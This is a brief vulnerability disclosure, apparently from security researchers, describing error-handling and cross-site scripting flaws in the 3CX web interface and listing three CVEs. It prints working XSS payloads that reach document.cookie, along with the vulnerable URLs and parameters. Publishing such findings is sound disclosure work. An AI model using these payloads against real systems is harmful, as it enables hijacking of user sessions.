Security Issues on 3cx Web Service

I’m Edward Toledano, a security researcher of STOLabs, me and my coworkers, Ricardo Fajin, Daniel Chactoura, Lucas Carmo, Kelvin Clark, Found some issues on the famous pabx 3cx .

The issues Found:

1. Multiple Improper error Handling
2. Cross Site Scripting Reflected
3. Cross Site Scripting on Stack trace

1) Multiple Improper error Handling

Researching the application we found several traceback errors. As an explample the error below. this could be especially dangerous because it gives, several informations about the server itself.

Evidence of the stack trace

2) Reflected Cross Site Script

URL: https://<IP>:<Port>/api/CallLog?TimeZoneName=<script>alert(document.cookie)</script>&callState=All&dateRangeType=Today&fromFilter=&fromFilterType=Any&numberOfRows=200&searchFilter=&startRow=0&toFilter=&toFilterType=Any

Payload used: <img src=`%00`&NewLine; onerror=alert(document.cookie)&NewLine;

Parameter: TimeZoneName

Evicende of the reflected XSS

3) Cross Site Script on Stack trace

URL: https://<ip>:5001/#/app/ivr_editor/4

Payload Used: <img src=`%00`&NewLine; onerror=alert(document.cookie)&NewLine;

Parameter: propertyPath

Evidence of the stack trace XSS 1

Evidence of the stack trace XSS 2

CVEs Related to this article:

CVE-2018–14905

CVE-2018–14906

CVE-2018–14907